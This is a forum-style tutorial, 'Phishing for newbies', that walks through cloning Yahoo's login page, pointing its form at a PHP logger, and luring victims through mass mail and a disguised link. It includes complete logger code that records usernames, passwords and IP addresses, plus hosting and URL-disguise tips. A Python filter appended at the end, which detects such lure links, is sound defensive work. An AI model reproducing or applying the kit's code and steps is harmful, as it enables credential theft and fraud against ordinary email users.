Phishing for newbies

K@izer

The Hosting
Your first going to want to find a webhost that wont automatically shut you down for phishing otherwise what's the point..I suggest making one on some free subdomains which really is a plus for phishing anyway if done correctly it can be very convincing some free webhosts i've found that are good to work with are:
110mb.com
10gbfreehost.com
Now these aren't the only good webhosts to work through phishers with but they are the only ones i've seen now from here it's basic php editing you may want to make an ftp connection to your subdomain through the 'My Network Places' in Windows or a nice ftp client such as cuteftp or quickftp.
-

The Work
Have you confirmed that you can connect via ftp to your host? Yes? good. Now we will actually create our phisher.

From experience in making tutorials you will probably want to open a notepad to take notes, Got it? no? you lazy bastard..Anywho we will be doing an example with Yahoo's email login it's quite simple no flashy .swf's or pictures the first thing we will do is view the source of the login page now copy this all and paste it to a index.php and save it, you can now close the target site. We want to find the command in the php that allows it to POST data so we'll simply do a search in the 'index.php' we made [CTRL+F] for post...You should've found:

<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return hash2(this)">

Good, now see that url

https://login.yahoo.com/config/login?

That's going to be pointing to our php poster so go ahead and replace that url with log.php dont worry about the rest, you may want to do a search for "/ but on the yahoo login page everything is directly linked, but on some pages like paypal there are some images and .swf's that are a link such as "/images/flashyshit.swf" now when you upload this onto your webhost it's gonna look for that and it wont be there so it wont be legit so go ahead and hit replace [CTRL+H] now replace all the "/ with [if we were doing paypal] "http://paypal.com/ that should correct all problems.
-

More Work
We need to find the username and password names why you ask? so we can post the fields to our .txt file through our poster (log.php) so go into the index.php once more and a search for username you should get:

<input name="login" id="username" value="" size="17" class="yreg_ipt" type="text" maxlength="96">

All we need to worry about is the name here it's login so we take our notes that you were supposed to open at the beginning of this tutorial ( I bet you feel like a smartass now :] ) and paste that field's name in there "login" so now we need the password's input name so do a search for password good you found it should look like:

<input name="passwd" id="passwd" value="" size="17" class="yreg_ipt" type="password" maxlength="64">

kai input name here is passwd so put that in your notes aswell now close and save the index.php
-

The Logger And Log
Now we need a poster of sorts, a .php file that will submit the text entered in the username and password fields so let's create our poster we said we'd call it log.php so do it, inside of that we need to post data:

<HEAD>
<script language="JavaScript">
<!--
window.location="SITEURL";
//-->
</SCRIPT>
</HEAD>
?<?php
$username = $_POST['USERNAMEFIELDNAME'];
$password = $_POST['PASSWORDNAMEFIELD'];
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$send = fopen("log.txt", "a");
fwrite($send, "SITEURL\r");
fwrite($send, "Username: $username \r");
fwrite($send, "Password: $password \r");
fwrite($send, "IP: $ip \r");
fwrite($send, "Host: $hostname \r");
fwrite($send, "---------------------------------------------------------\r");
fclose($send);
?>

Now we already know our username and password field names from our notes and our targeturl is http://mail.yahoo.com/ soo...

<HEAD>
<script language="JavaScript">
<!--
window.location="http://mail.yahoo.com/";
//-->
</SCRIPT>
</HEAD>
?<?php
$username = $_POST['login'];
$password = $_POST['passwd'];
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$send = fopen("log.txt", "a");
fwrite($send, "http://mail.yahoo.com/\r");
fwrite($send, "Username: $username \r");
fwrite($send, "Password: $password \r");
fwrite($send, "IP: $ip \r");
fwrite($send, "Host: $hostname \r");
fwrite($send, "---------------------------------------------------------\r");
fclose($send);
?>

And there's your logger now in this logger you see $send = fopen("log.txt", "a"); well now obviously we need to create a .txt document called log.txt personally i change the name because fellow hackers steal your work, but for this tut for we're using log.txt so just create a blank .txt file named log
-

Upload
Finally it's your time to shine time to upload all this BS so get it all together an upload that bitch you may want to make it look good put it in a long named folder like "mail.yahoo.com/email.aspx?ffie=emailconfirmation/index.php" so now your going to have to change the permissions on the log.txt why? you have to allow the person you hooked to access the .txt file to write the info from our poster so change the permissions on it to '777' and click 'ok' now your done.
-

DONE
Your done....now what? well you may want to look into some mass mailing software and some email spider programs all very easy to obtain free you can use scam letters to trick people into going to your site in the letter by making an url in html such as:

<a href="http://PHISHERURL/mail.yahoo.com/email.aspx?ffie=emailconfirmation/index.php">http://mail.yahoo.com/email.aspx?ffie=emailconfirmation</a>

And that's about all you can do advertise and sharpen your social engineering skills


Good luck guys .
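
On the receiving side, the lure link shown at the end of the post has two properties a mail filter can check: the visible text names one host while the href goes to another, and the first folder in the path is itself shaped like a hostname. The Python below is an added example, not part of the original post; the function names, the sample mail body and the host mailer.example are constructed for illustration, and both checks are heuristics.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

HOSTLIKE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)  # heuristic only

class _Anchors(HTMLParser):  # collects (href, visible text) for every <a>
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def _host(url):
    return (urlsplit(url).hostname or "").lower()

def suspicious_links(html):
    """Return (href, reasons) for anchors that show either lure pattern."""
    parser = _Anchors()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        reasons = []
        real = _host(href)
        shown = _host(text) if "://" in text else ""
        if shown and shown != real:
            reasons.append(f"text shows {shown}, link goes to {real}")
        parts = urlsplit(href).path.lstrip("/").split("/")
        if len(parts) > 1 and HOSTLIKE.match(parts[0]) and parts[0].lower() != real:
            reasons.append(f"hostname-like folder '{parts[0]}' in path")
        if reasons:
            findings.append((href, reasons))
    return findings

# Constructed sample mail body; mailer.example is a placeholder host.
SAMPLE = (
    '<p>Confirm: <a href="http://mailer.example/mail.yahoo.com/'
    'email.aspx?ffie=emailconfirmation/index.php">'
    'http://mail.yahoo.com/email.aspx?ffie=emailconfirmation</a></p>'
    '<p><a href="https://mail.yahoo.com/">https://mail.yahoo.com/</a></p>'
)
```

Calling `suspicious_links(SAMPLE)` flags only the first anchor, with both reasons; the second anchor, whose text and target agree, passes.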
 